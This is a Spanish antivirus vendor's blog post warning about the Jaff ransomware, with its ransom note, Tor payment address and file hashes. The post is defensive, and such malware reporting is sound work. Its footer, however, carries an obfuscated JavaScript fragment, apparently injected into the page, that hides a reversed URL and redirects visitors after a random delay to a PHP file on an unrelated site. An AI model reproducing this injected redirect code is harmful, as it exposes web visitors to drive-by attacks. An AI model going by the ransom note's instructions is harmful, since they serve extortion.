NUEVA FAMILIA DE RANSOMWARES QUE AÑADEN EXTENSION .JAFF A LOS FICHEROS CODIFICADOS, MANTENIENDOLES EL NOMBRE INICIAL
Un nuevo ransomware JAFF que codifica incluso los ficheros del sistema, de la carpeta %WinDir%, si bien al menos no toca los .EXE, por lo que Windows arranca tras el cifrado, aunque cojo por la falta de drivers cifrados, ha hecho su aparición
No genera ninguna llamada en el Registro del sistema, por lo que, tras reiniciar, no prosigue su actuación.
En todas las carpetas donde ha cifrado ficheros, deja el siguiente texto:
”
jaff decryptor system
Files are encrypted!
To decrypt flies you need to obtain the private key.
The only copy of the private key, which will allow you to decrypt your files, is located on a secret server
in the Internet
You must install Tor Browser: https://www.torproject.org/download/download-easy.html.en
After instalation,run the Tor Browser and enter address: http://rktazuzi7hbln7sy.onion/
Follow the instruction on the web-site.
Your decrypt ID: 0988395932
”
y en la máquina que ha infectado (la que ha ejecutado el malware), deja este fondo de escritorio:
Lo pasamos a controlar a partir del ELISTARA 36.81 de hoy
El preanalisis de virustotal ofrece el siguiente informe:
MD5 924c84415b775af12a10366469d3df69
SHA1 8ab568db2bc914e3e6af048666eb0bc4ba2e414d
Tamaño del fichero 152.0 KB ( 155648 bytes )
SHA256:
0746594fc3e49975d3d94bac8e80c0cdaa96d90ede3b271e6f372f55b20bac2f
Nombre:
0746594fc3e49975d3d94bac8e80c0cdaa96d90ede3b271e6f372f55b20bac2f.bin
Detecciones:
10 / 60
Fecha de análisis:
2017-05-11 11:05:50 UTC ( hace 2 minutos )
total
Dicha versión del ELISTARA 36.82 que lo detecta y elimina, estará disponible en nuestra web a partir del 12/5 prox
saludos
ms, 11.5.2017
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.